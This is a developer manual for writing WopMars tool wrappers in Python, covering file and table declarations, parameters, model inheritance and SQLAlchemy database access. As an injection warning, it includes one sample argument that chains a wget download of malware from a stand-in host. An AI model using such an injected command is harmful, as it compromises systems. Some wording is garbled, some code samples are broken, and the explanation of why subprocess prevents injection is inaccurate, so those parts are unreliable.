The Tool Wrappers

This manual aims to explain with simple words how to write the tool wrappers in order to allow a fresh Python developer to configure his own analysis workflow. This manual often refers to the Wopfile so I recommand you to keep the Wopfile section open in case of blackout.

This starting guide will allow you to understand the main mecanisms which rule WopMars. It means the way WopMars talks with the tool wrappers you are using to understand their role in the workflow in terms of input and output parameters.

To illustrate the necessary conditions to build a correct Toolwrapper, we will use some kind of TO DO task list to prevent forgetting steps. The order doesn’t matter but, I insist, each step is essential.

Developing basic tool wrappers

Declaring your class

To define a Toolwrapper we will use an important concept of the Object Oriented Programming (OOP) which is abstract inheritance.

Note

An abstract class is a class which represent a concept and, consequently, which is not supposed to be instantiated. For example, the bird concept: a bird flies and sings: an abstract class Bird would have methods like fly and sing with nothing inside. Actually, there are no species called “bird”, however, there are ducks and eagles. A duck is a realization of the concept of “bird”. In OOP, the class Duck would inherit from Bird and would overide the methods fly and sing to specialize them in order to fit with the duck characteristics. Here, Duck is a subclass of Bird.

A Toolwrapper compatible with WopMars have to be a subclass of the abstract class, prepare yourself, Toolwrapper! For WopMars, every Toolwrapper is a subclass of Toolwrapper and if you ask it to work with a class which do not satisfy this simple condition, you’ll obtain an error. The reason for that is simple: if your Toolwrapper inherit from Toolwrapper, then it is certain that it contains some methods and attributes familiar to WopMars. Otherwise, there are no guarantees.

An other important thing necessary to work with WopMars is to provide the static class attribute __mapper_args__ to your Toolwrapper. This attribute is a dictionnary which should have polymorphic_identity as key and the full name of the class (contained in a String) as value. This information is necessary to WopMars because when it will store the tool wrappers informations into the database, WopMars will be able to keep track of the inheritance between your Toolwrapper and the Toolwrapper class.

Note

A static class attribute is an attribute associated with a class and not with a specific object of this class. Modifying this kind of attribute in an object of a given class is somehow similar to modifying this attribute in every object of the class (those that already exist and those future).

Here is an example of the declaration of a class called SparePartsManufacturer:

from wopmars.models.ToolWrapper import ToolWrapper


class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }
    pass

You have now created your first Toolwrapper, but the aims to use abstract class inheritance is to guarantee to WopMars that each Toolwrapper implements some methods which describe its role.

Toolwrapper specifying methods

A good way to see a Toolwrapper is to see it as an independant software. Meaning that it has a well defined role which is to generate a specific output in terms of a specific kinf of input with some options to parametrize its behavior. Anyway, this is the way WopMars is “watching” to the tool wrappers. The link between a Toolwrapper and WopMars is done thanks to inherited methods from Toolwrapper which have to be re-wrote by the Toolwrapper developer.

Describing files: specify_input_file and specif_output_file

The files called input files and output files are, on the one hand, the necessary files for the tool to work and, on the other hand, the files generated by the tool. A Toolwrapper doesn’t rely on a specific file on the machine: it shouldn’t access a file in a hard-coded way but should use some kind of variable containing the path to the given file. It is for the Toolwrapper developer to specify those variable names and they have to be respected in the workflow definition file (see Wopfile section). Those variable names are known by WopMars thanks to the methods specify_input_file (for the variable names associated with inputs) and specify_output_file (for the variable names associated with outputs). Those methods have to return each one a list containing the Strings containing the variable names accepted by the Toolwrapper.

Warning

Every files asked by a Toolwrapper are required. It means that the processing of the Toolwrapper rely on every asked inputs and outputs. If a file is optional, you should specify it in the method specify_params (we will see it later)

The class SparePartsManufacturer takes a file in input but doesn’t produce any output file. The input file path will be contained in the field named “pieces”.

class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_file(self):
        return ["pieces"]
Describing tables: specify_input_table and specify_output_table

WopMars makes its Toolwrapper able to iterate_wopfile_yml_dic_and_insert_rules_in_db and write entries in a database. Like for the files, the tool wrappers have to specify in which table of the database they will iterate_wopfile_yml_dic_and_insert_rules_in_db (input tables) and in which they will write (output tables). So, the Toolwrapper class implements the methods specify_input_table and specify_output_table. However, this time, the Strings contained in the returned list are associated with both the variables containing the table models and the name of the tables itself.

The final user have to write the same table names as keys in the table part of the definition file (see Wopfile section) and the path to the models associated with those tables as the values to specify which one the Toolwrapper should use. Usually, a Toolwrapper is closely related to a specific model but we can imagine that if two models are similar for a given Toolwrapper, it could use one or the other independantly (for example, if a model B inherit from the model A, then every Toolwrapper able to use A should be able to use B too).

Note

At the moment, the concept of model shouldn’t be clear but don’t worry, in the section concerning the models, you will get more explanations about those models. At the moment, simply note that the Toolwrapper communicate its input and output table names in the methods specify_input_table and specify_output_table.

Here is the rest of the Toolwrapper SparePartsManufacturer which writes its results in the table piece:

class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_file(self):
        return ["pieces"]

    def specify_output_table(self):
        return ["piece"]
Describing paramaters: specify_params

An other feature offered by the tool wrappers is to allow you to specify some parameters for the processing of the wrapper. Usually, those parameters will be associated with the options allowed by the analysis tool itself. They may also correspond to options used by the toolwrappers to offer flexibility for the pre and post processing of the data.

To specify which options a Toolwrapper is able to understand, it implements a method specify_params. This method returns a dictionnary in which each key correspond to the name of the option which will be used in the definition file (see Wopfile section) and each value, a String representing its type. The availables types are the following (to memorize them, just think about the different Python data types): - int - float - str - bool

Furthermore, the key word required is available and allows to specify that one option has to be given by the user for the tool to run. To specify the type and use required at the same time, the character | will be used as a delimiter inside the String.

In the following class, the parameter max_price is an int and will be used to get only the entries with a price lower than it, if set.

class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_file(self):
        return ["pieces"]

    def specify_output_table(self):
        return ["piece"]

    def specify_params(self):
        return {
            "max_price": int
        }

Declaring the method run

The run method contains the core of your Toolwrapper. The data processing and the call to the underlying analysis tool will be done here.

Calling files: self.input_file and self.output_file

The path to the files given by the final user are manipulated thanks to the methods self.input_file and self.output_file with the name of the variable containing the desired file as argument. For example, in our definition file, we have:

rule Rule1:
    tool: 'wrapper.SparePartsManufacturer'
    input:
        file:
            pieces: 'input/pieces.txt'

We can access the string input/pieces.txt with the following statement:

self.input_file("pieces")
Calling models: self.input_table and self.output_table

The models given by the user can be accessed thanks to the methodes self.input_table and self.output_table with the table name as argument. This way, and unlike the files, you won’t get the string representing the model but the model itself. For example:

output:
    table:
        piece: 'model.Piece'

We can access the model Piece with the following statement:

self.output_table("piece")
Session and accessing the database

If you are using WopMars, it is probably for the database access. Now, you know how to call the models from your method run but you probably doesn’t know what to do with them. This section aims to explain how you should use your models and a session to access the database.

Note

When you are working with databases, there is three level of hierarchy of the work you are performing on it: the session, the transaction and the operation:

  • The operation corresponds to each single task you are asking the database to do (SELECT, INSERT, UPDATE, DELETE, etc.)
  • The transaction is a series of operations which are closely related (for example: SELECT, compute then INSERT). When a transaction finishes, the state of the database is checked, if every thing seems right and well ordered, the transaction is validated (COMMIT), if not, the whole transaction is canceled (ROLLBACK) in order to return to a stable state.
  • The session is a series of transactions which are independant. In other words, when you want to work with the database, you open a session and it says “I’m gonna work with you, database, are you ok?”. Then, every operations you will perform will be associated with __your__ session before being COMMITED or ROLLBACKED.

Developing Advanced tool wrappers

Now that you understand the basics of the development of the tool wrappers you may want to do more advanced tricks to deal with WopMars.

Parametrize inputs and outputs

During the parsing of the configuration file, WopMars check first the validity of the parameters and then look at the inputs and outputs. This behavior allow you to parametrize which input and output your Toolwrapper is supposed to take depending on the used parameters. In this example, the parameter to_file is a boolean and if it is True, the result is written in a file instead of the database.

class CarAssembler(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_output_file(self):
        if not self.option("to_file"):
            return []
        else:
            return ["piece_car"]

    def specify_input_table(self):
        return ["piece"]

    def specify_output_table(self):
        if self.option("to_file"):
            return []
        else:
            return ["piece_car"]

    def specify_params(self):
        return {
            "to_file": "bool",
            "max_price": "int",
        }

And there, the definition file (Wopfile2.yml in the example directory) look like this:

# Rule1 use SparePartsManufacturer to insert pieces informations into the table piece
rule Rule1:
    tool: 'wrapper.SparePartsManufacturer'
    input:
        file:
            pieces: 'input/pieces.txt'
    output:
        table:
            piece: 'model.Piece'

# CarAssembler make the combinations of all possible pieces to build cars and calculate the final price
rule Rule2:
    tool: 'wrapper.CarAssembler'
    input:
        table:
            piece: 'model.Piece'
    output:
        # Here the output is written in a file
        file:
            piece_car: 'output/piece_car.txt'
    params:
        # The price have to be under 2000!
        max_price: 2000
        to_file: True

Inherit models

During the conception of your workflows, you may want to make multiple rules write in the same table in a specific order (for example, one rule create entries and the other add informations in the fields). Basically, you would do like ever, playing with inputs and outputs in order to fit your needs but this way, you will be stuck with a logic problem where WopMars won’t be able to say “this rule should be run before this one”, like in the following schema:

../_images/model_inheritance.png

If you want the rules to be run in this specific order, WopMars can’t understand if `rule 2` is supposed to run before `rule 4` on the basis of the table names

You can bypass this issue using model inheritance. With the model inheritance, you can build a model which inherit from a former model and add it some new attributes.

Taking back our model example Piece, we need an other model which add the field date to the table. We call this model DatedPiece

from sqlalchemy.sql.sqltypes import Date
from sqlalchemy import Column

from model.Piece import Piece


class DatedPiece(Piece):
    date = Column(Date)

With this model, there is an other Toolwrapper provided in the example: AddDateTopiece which show use of the same table as input and output. You can note that here, the output_table only is used. Actually, we are interested here in only DatedPiece objects:

import time, datetime
import random

from wopmars.framework.bdd.tables.ToolWrapper import ToolWrapper


class AddDateToPiece(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_table(self):
        return ["piece"]

    def specify_output_table(self):
        return ["piece"]

    def run(self):
        session = self.session
        DatedPiece = self.output_table("piece")

        for p in self.session.query(DatedPiece).all():
            date = datetime.datetime.fromtimestamp(time.time() - random.randint(1000000, 100000000))
            p.date = date
            session.add(p)
        session.commit()

Executing clean command line

In your learning of Python, you may have encountered the famous os.system("command-line") and you probably want to make use of it again. Sorry, you shouldn’t do things this way. Especially if you are running long analysis software. Instead, I’ll show you how to use the module subprocess for simple things and, please, use it extensively in order to get more control on the command lines you are executing.

Note

As far as I know, there is two main differences between os.system() and subprocess plus the fact that subprocess is actually a little more difficult to use than the former:

  • os.system() is very sensible to malicious code injection. Example:

    def list_extension(ext):
        os.system("ls -1 *." + str(ext))
    

    This function is supposed to list all the files of a given extension in the directory. But if, instead of passing txt as argument, I pass txt; wget http://malicious.server/malware then, the function will list the files with txt extension and download the malware from the malicious server!

    Now, with subprocess.Popen, you can’t do such a thing because spaces are not allowed inside arguments:

    def list_extension(ext):
        subprocess.Popen(["ls", "-1", "*." + str(ext)])
    
  • subprocess open a Pipe between the python process and the subprocess whereas os.system calls a subshell independant of the first. This difference makes the communication between the subprocess and your python code far more easy with subprocess instead of os.system in which it is nearly impossible

Reading/writing to the database

Reading and writing to the database has to be carried out through the WopMars session. The WopMars session implements a lock system to prevent database inconsistencies. There are three implemented methods to iterate_wopfile_yml_dic_and_insert_rules_in_db/write to the database with the wopmars session.

  • SQLAlchemy ORM
  • SQLAlchemy core
  • Pandas read_sql and to_sql

SQLAlchemy ORM

The SQLAlchemy ORM is very simple but it is also quit slow after 100 objects. Inside the run method of the tool wrapper, we will can take a WopMars session simply with self.session and then call SQLAlchemy ORM methods on it.

# This code is for illustration purpose and has not been tested
# inside the run of a tool wrapper MyWrapper
def run(self):
    session = self.session
    my_input_model = self.output_table(MyWrapper.__input_table1)
    query_dic = {'col1': value_1, 'col2': value_2}
    try: # check if query_dic exists
        session.query(my_input_model).filter_by(**query_dic).one()
    except: # if not add and later commit
        snp_instance = snp_model(**snp_dic)
        session.add(snp_instance)
    session.commit()

SQLAlchemy core

Inside the run method of the tool wrapper, we need to retrieve a list of object dictionaries in the database. Then we check if new objects are not already in the database and then insert a list of such object dictionnaries.

# This code is for illustration purpose and has not been tested
# inside the run of a tool wrapper MyWrapper
def run(self):
    session = self.session
    engine = session._WopMarsSession__session.bind
    conn = engine.connect()
    #
    my_input_model = self.output_table(MyWrapper.__input_table1)
    #
    # retrieve all objects in database
    sql = select([my_input_model.col1])
    my_input_model_in_db = [{'col1': row[0] for row in conn.execute(sql)}]
    # check if new col1:val1 not already in db
    if not {'col1': val1} in my_input_model_col1_db:
        # add to list of value dics
        my_input_model_new_objects=[{'col1': val1}]
    # bunch insert list of value dics
    engine.execute(my_input_model.__table__.insert(), [my_input_model_val1_dic])